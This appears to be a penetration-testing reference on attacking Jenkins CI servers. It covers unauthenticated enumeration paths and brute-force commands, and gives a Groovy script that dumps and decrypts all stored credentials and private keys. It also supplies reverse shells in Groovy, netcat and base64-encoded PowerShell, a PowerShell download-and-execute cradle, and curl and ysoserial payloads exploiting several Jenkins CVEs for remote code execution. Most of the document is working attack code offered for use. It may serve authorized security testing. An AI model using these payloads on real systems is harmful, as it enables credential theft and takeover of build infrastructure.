# Jenkins ### Overview `Jenkins` is a free and open source platform designed for facilitating continuous integration and continuous delivery of software development projects. It implements building, testing, and deploying capacities and supports various version control (`Git`, `Apache Subversion`, `Mercurial`, etc.) and build automation (`Apache Maven`, `Gradle`, `Apache Ant`, etc.) utilities. The building and deploying tasks can be distributed on a `Jenkins Master` server and one or multiple optional `Jenkins Slave` servers. ### Unauthenticated enumeration The `Jenkins` web interface may be configured to allow unauthenticated users to perform a number of actions, ranging from retrieving the `Jenkins` appliance's configuration to executing `Groovy` script on the `Jenkins Master` and `Jenkins Slave` servers. Indeed, the access control of the `Jenkins` appliance can be configured to `"Anyone can do anything"`, which grant full privileges to unauthenticated users, or `"Legacy mode"` which gives unauthenticated users full read access. Additionally, access to individual components can be granted to `Anonymous Users` through the `Matrix-based security`. | Path | Description | | ------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `/systemInfo/` | Display the appliance configuration. | | `/asynchPeople/` |

Lists the local users of the appliance.
Accessible to Anonymous Users if the authorization is set to Legacy mode.

| | `/view/all/builds` |

List the current and past builds.
Accessible to Anonymous Users if the authorization is set to Legacy mode.

Default path of the Credentials plugin, used to manage stored credentials.
Accessible to Anonymous Users if the authorization is set to Legacy mode.

For more information, refer to the Build jobs secrets section below.

| | `/script` |

The Script Console, a Groovy script interpreter that can be leveraged to execute code on the Jenkins servers.

For more information, refer to the Code execution on Jenkins servers through the Script Console section below.

| The `metasploit`'s `auxiliary/scanner/http/jenkins_enum` module attempts, in an unauthenticated manner, to enumerate the `Jenkins` version and to access a number of the `URL` above. ### Authentication brute force Among others, `Metasploit` and `patator` can be used to brute force the authentication of a `jenkins` instance through its web interface. ``` # JENKINS_LOGIN_URL: /j_acegi_security_check msf > use auxiliary/scanner/http/jenkins_login patator http_fuzz -t <50 | NUMBER_THREADS> url="" method=POST body='j_username=FILE0&j_password=FILE1' 0= 1= -x ignore:fgrep='loginError' ``` ### Build jobs secrets Various kind of secrets, such as passwords or API keys, can be stored in `Jenkins` in order to be accessible by `Jenkins`'s `continuous delivery` builds. As, by design, `Jenkins` must be able to provide clear text credentials if necessary to the utilities in the pipelines, the secrets are retrievable given sufficient privileges on the `Jenkins` appliance. The secrets definition, management and usage are implemented through a number of `Jenkins` plugins: * the `Credentials plugin`, which implements the credentials management interface, accessible at the `/credentials/` URL. * the `Credentials Binding plugin`, which allows `Jenkins` build jobs to inject credentials directly as environment variables. * the `Folders plugin`, which can be used to reduce the accessibility of `Credentials` to certain build jobs. The credentials registered through the `Credentials plugin` can either be defined with one of the following scope: * `System`, to be only accessible from the `Jenkins` instance itself and its' plugins. * `Global`, to be accessible to the `Jenkins` instance as well as to all build jobs. * If the `Folders plugin` is installed, locally to a `Jenkins folder` in order to only be accessible to the build jobs defined in the folder. `Credentials` are stored encrypted locally on the `Jenkins` servers through the following files: * `$JENKINS_HOME/credentials.xml`: file that store the encrypted `Credentials`. * `$JENKINS_HOME/secrets/hudson.util.Secret`: encrypted file that store the `AES-128` key used to encrypt the `Credentials` in the `credentials.xml` file. * `$JENKINS_HOME/secrets/master.key`: plain text key file that contains the key to decrypt the `hudson.util.Secret` file. **Credentials dumping through the Script Console** The `Script Console` can be used to execute a `Groovy` script that will retrieve and decrypt all stored `Credentials`. The permissions to access the `Script Console` (`Overall/RunScripts`) and to retrieve `Credentials` (`Credentials/View`) are required. The `Groovy` script below dumps the username / password and private key credentials from both the `System` and `Global` scopes as well as credentials defined locally in `Jenkins folders`. ```java import jenkins.model.*; import com.cloudbees.hudson.plugins.folder.*; import com.cloudbees.hudson.plugins.folder.properties.*; import com.cloudbees.hudson.plugins.folder.properties.FolderCredentialsProvider.FolderCredentialsProperty; import com.cloudbees.plugins.credentials.impl.*; import com.cloudbees.plugins.credentials.*; import com.cloudbees.plugins.credentials.domains.*; // Retrieves the System and Global credentials. def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials( com.cloudbees.plugins.credentials.common.StandardUsernameCredentials.class, Jenkins.instance, null, null ); for (c in creds) { if (c.properties.privateKeySource) { println((c.properties.privateKeySource ? "ID: " + c.id + ", username: " + c.username + ", private key: " + c.getPrivateKey() : "")) } } for (c in creds) { if (c.properties.password) { println((c.properties.password ? "ID: " + c.id + ", username: " + c.username + ", password: " + c.password : "")) } } // Retrieves the credentials defined through Folders. def allJenkinsItems = Jenkins.getInstance().getItems(); for (currentJenkinsItem in allJenkinsItems) { if(!(currentJenkinsItem instanceof Folder)) { continue } currentFolder = (Folder) currentJenkinsItem; println () println (currentFolder.getFullName()) def credsFolders = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials( com.cloudbees.plugins.credentials.common.StandardUsernameCredentials.class, currentFolder, null, null ); for (c in credsFolders) { if (c.properties.scope == CredentialsScope.GLOBAL) { continue } if (c.properties.privateKeySource) { println((c.properties.privateKeySource ? "ID: " + c.id + ", username: " + c.username + ", private key: " + c.getPrivateKey() : "")) } } for (c in credsFolders) { if (c.properties.scope == CredentialsScope.GLOBAL) { continue } if (c.properties.password) { println((c.properties.password ? "ID: " + c.id + ", username: " + c.username + ", password: " + c.password : "")) } } } ``` **Credentials dumping through code execution on a Jenkins server** If the `credentials.xml`, `hudson.util.Secret` and `master.key` files could be retrieved from a `Jenkins` server, the credentials can be retrieved using the\ `jenkins_offline_decrypt` `Python` script: ``` python3 jenkins_offline_decrypt.py ``` **Credentials leak in build jobs** Credentials and secrets may leak in build jobs console outputs and environment variables. Note that the `Mask Passwords Plugin` plugin may be in use to redact the secrets from the `Console Output` build log. The `jenkins_dump_builds` Python script can be used to dump all build jobs past builds. ``` # Source: https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py python3 jenkins_dump_builds.py -o python3 jenkins_dump_builds.py -o -u "" -p "" ``` The `grep` or `ngp` utilities can then be used to search for matching keywords in the dump build jobs console outputs and environment variables: ``` grep -rin "" ngp -ri "" ``` ### Code execution on `Jenkins` servers **Through the Jenkins' Script Console** The `Jenkins`'' `Script Console` can be used to execute a `Groovy` script that will in turn execute operating system commands. Access to the `Script Console` requires the `Overall/RunScripts` permission (which depending on the access control of the targeted `Jenkins` appliance can be granted to unauthenticated users). The `Script Console`, that will execute code on the `Jenkins` `master`, is accessible at the `/script` path. Additionally, code can be executed on a specific `Jenkins` slaves / agents by accessing the `Script Console` through the targeted node status page: ``` URL: /computer/()/script Or through the interface menus: visit "Manage Jenkins" > "Manage Nodes" > Select the targeted Jenkins node -> "Script Console" (on the left panel). ``` ``` # Unitary OS command execution. def proc = "".execute(); def os = new StringBuffer(); proc.waitForProcessOutput(os, System.err); println(os.toString()); # Reverse shell in Groovy. # Source: https://gist.githubusercontent.com/frohoff/fed1ffaab9b9beeb1c76/raw/7cfa97c7dc65e2275abfb378101a505bfb754a95/revsh.groovy # BINARY: /bin/sh | /usr/bin/bash | cmd.exe | powershell.exe | ... String host=""; int port=; String cmd=""; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` **Through build jobs** Operating systems commands can be executed as `steps` in `Jenkins` build jobs. Doing so requires the `Job\Read`, `Job\Configure` and `Job\Build` permissions. Depending on the architecture, the commands will be executed: * on the `Jenkins` `master` in a standalone server configuration; * on the `Jenkins` `slaves` / `agents` by default in a distributed builds environment. Indeed, in environments including `slaves` / `agents`, the `Jenkins` `master` node will use its resources to handle `HTTP` requests and the scheduling / management of build jobs while the actual execution of the builds will be delegated to the `slaves` / `agents` nodes. `Jenkins` supports the execution of shell and batch commands in build jobs. The commands specified through the web interface will be stored locally in a temporary `bat` or `sh` script file on the node handling the build. The file will be executed using, respectively, the following operating system commands: `cmd /c call ` and `sh -xe `. The process below can be followed to configure a `step` in a `Jenkins` job and build the job for remote code execution through a reverse shell: ``` # Configuration of the step in a given build job. -> Main dashboard -> (to access the page: /job//) -> Left panel, "Configure" (to access the configuration page: /job//configure) -> Build section, "Add build step" -> "Execute Windows batch command" / "Execute shell" # The following reverse shells can be used to achieve remote code execution. # For more information, refer to the "[General] Shells" note. # Shell ("Execute shell") # If nc's "-e" option is available on the targeted system: nc -e /bin/sh & rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f # Windows PowerShell ("Execute Windows batch command") # As PowerShell one-liners tend to induce errors if executed directly as PowerShell commands, it is recommended to either encode the command in base64 before executing it or to specify the command in a ps1 script and to download and execute it in memory through an HTTP request. # Base64 (should be done off target) $cmd = '$client = New-Object System.Net.Sockets.TCPClient("",);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' $Bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd) $EncodedCmd =[Convert]::ToBase64String($Bytes) $EncodedCmd powershell -NoP -NonI -W Hidden -Exec Bypass -Enc # HTTP # Requires to host a webserver, which can be done using Python. Refer to the "[General] File transfer" note for more information. # PowerShell one-liner to store in an web hosted file: $client = New-Object System.Net.Sockets.TCPClient("",);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() powershell -NoP -NonI -W Hidden -Exec Bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://:/') # Build of the updated job. -> Job dashboard -> Left panel, "Build" (to access the immediate build API: /job//build?delay=0sec) # If necessary, for debugging purposes, the console output of the build can be consulted. -> Job dashboard -> Left low panel "Build History", -> Left panel, "Console Output" (to access /job///console ``` ### Known critical vulnerabilities `Jenkins`, and some of its plugins, has been vulnerable to a few published critical security flaws, allowing for remote code execution: | Vulnerable version | CVE number | Pre-requisite | Exploit | | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | <= Jenkins 1.638 | CVE-2015-8103 | Unauthenticated |

Source:

java -jar ysoserial-master.jar CommonsCollections1 '\' > payload.out
jenkins\_rce.py \ \ payload.out

Metasploit module: exploit/linux/misc/jenkins\_java\_deserialize.

| |

< Jenkins 1.650

< Jenkins LTS 1.642.2

| CVE-2016-0792 | Unauthenticated |

Source:

python3 >>> from exploit import exploit
python3 >>> exploit(\, \)

Metasploit module: exploit/multi/http/jenkins\_xstream\_deserialize.

| |

< Jenkins 2.32

< Jenkins LTS 2.19.3

If ANONYMOUS\_READ is disabled:
< Jenkins 2.138

If ANONYMOUS\_READ is enable or with a valid account:
Jenkins build time < 2019-01-28

CVE-2019-1003000
CVE-2019-1003001
CVE-2019-1003002
CVE-2019-1003005

Depending on the targeted version:

Unauthenticated

ANONYMOUS\_READ enabled / valid user account.

Source:

exp.py \ \

Metasploit module: exploit/multi/http/jenkins\_metaprogramming.

| | < Pipeline Groovy Plugin 2.63 |

CVE-2019-1003029
CVE-2019-1003030

| `Overall/Read` permission |

Source:

Tests vulnerability by inducing a sleep:
curl -k -4 -X POST "" -d "sandbox=True" -d 'value=class abcd{abcd(){sleep(5000)}}'

Command execution:
curl -k -4 -X POST "" -d "sandbox=True" -d 'value=class abcd{abcd(){"\".execute()}}'

Throws an error for debugging purposes: curl -k -4 -X POST "" -d "sandbox=True" -d 'value=class abcd{abcd(){def proc="id".execute();def os=new StringBuffer();proc.waitForProcessOutput(os, System.err);throw new Exception(os.toString())}}'

Source:

Retrives the required CSRF token:
curl '\/user/test/crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)' -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36' -H 'DNT: 1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: \' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,it;q=0.8' -H 'Cookie: \' --compressed

Command execution:
curl '\/job/test/descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl' -d "value=--upload-pack=`<CMD>`" -H 'Cookie: \' -H 'Origin: \' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,it;q=0.8' -H 'X-Prototype-Version: 1.7' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Jenkins-Crumb: \' -H 'Pragma: no-cache' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36' -H 'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: text/javascript, text/html, application/xml, text/xml, */*' -H 'Cache-Control: no-cache' -H 'Referer: \/job/test/configure' -H 'DNT: 1' --compressed